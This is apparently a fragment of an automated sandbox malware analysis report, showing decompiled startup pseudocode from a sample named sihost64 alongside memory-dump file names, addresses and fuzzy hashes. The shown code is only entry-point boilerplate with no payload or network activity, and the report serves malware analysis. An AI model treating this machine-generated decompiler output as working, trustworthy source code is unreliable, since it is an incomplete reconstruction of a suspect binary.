				L00402488();
				L004024B8();
				L004024C0();
				L004024C8();
				_v24 = __imp____argc;
				_v40 =  &_v12;
				L004024D0();
				_v24 = __imp____argc;
				_t15 = E0040224F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
				L004024D8(); // executed
				return _t15;
			}








                                                                                                                                    0x00402327
                                                                                                                                    0x00402339
                                                                                                                                    0x00402349
                                                                                                                                    0x00402364
                                                                                                                                    0x0040237e
                                                                                                                                    0x00402386
                                                                                                                                    0x004023a7
                                                                                                                                    0x004023c1
                                                                                                                                    0x004023e0
                                                                                                                                    0x004023eb
                                                                                                                                    0x004023f1

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000016.00000002.771659577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000016.00000002.771633101.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000016.00000002.771697167.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000016.00000002.771734104.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_22_2_400000_sihost64.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
                                                                                                                                    • Instruction ID: 58fa82481bd9f7f1a31c280291aa64e56759039c55656078795ddd0d8845b760
                                                                                                                                    • Opcode Fuzzy Hash: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
                                                                                                                                    • Instruction Fuzzy Hash: E3212BA4301A148CEA80DB67DE5539937A4B74DFC8F80443AAF4CB73A5EEBCD9018358
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040224F, Relevance: .0, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 56 40224f-4022ca call 402158 call 4010c4 call 4021ec
                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                    			E0040224F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v12;
				long long _v24;
				intOrPtr _t14;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				E00402158(_a16, _a16, _a24);
				_v24 = __imp____argc;
				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
				_v12 = _t14;
				E004021EC();
				return _v12;
			}






                                                                                                                                    0x0040225a
                                                                                                                                    0x0040225e
                                                                                                                                    0x00402262
                                                                                                                                    0x00402280
                                                                                                                                    0x0040229a
                                                                                                                                    0x004022b9
                                                                                                                                    0x004022be
                                                                                                                                    0x004022c1
                                                                                                                                    0x004022ca

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000016.00000002.771659577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000016.00000002.771633101.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000016.00000002.771697167.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000016.00000002.771734104.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_22_2_400000_sihost64.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: memsetsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4041149307-0
                                                                                                                                    • Opcode ID: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
                                                                                                                                    • Instruction ID: 92290081071787e676730f83583c100b5cfe817de0e22f796d573c3dbb31d607
                                                                                                                                    • Opcode Fuzzy Hash: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
                                                                                                                                    • Instruction Fuzzy Hash: CA01A4B6701B588DDB40DF66DD9139837B4B309BC8F00482AAF5CA7B69DA78D6118748
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions